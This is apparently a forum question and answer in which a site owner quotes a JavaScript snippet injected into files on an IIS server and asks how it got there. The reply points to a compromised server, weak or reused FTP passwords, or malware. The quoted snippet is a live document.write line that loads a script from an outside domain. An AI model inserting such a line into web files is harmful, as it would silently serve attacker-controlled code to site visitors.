I have many javascript and html files in my IIS server. Some days before, some strange code injected into the files. Code below.
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
I have removed this code from all the javascript files. Please help me to know about how these code injected into my files in the server. I have gone through XSS attacks. But I can't find anything. Thanks in advance.
If you have only static HTML and JS files and no database attached, then probably your server is compromised. Either you have weak FTP passwords or you reuse the password from your email address.
Or your server or the Computer accessing the server is infected with some malware.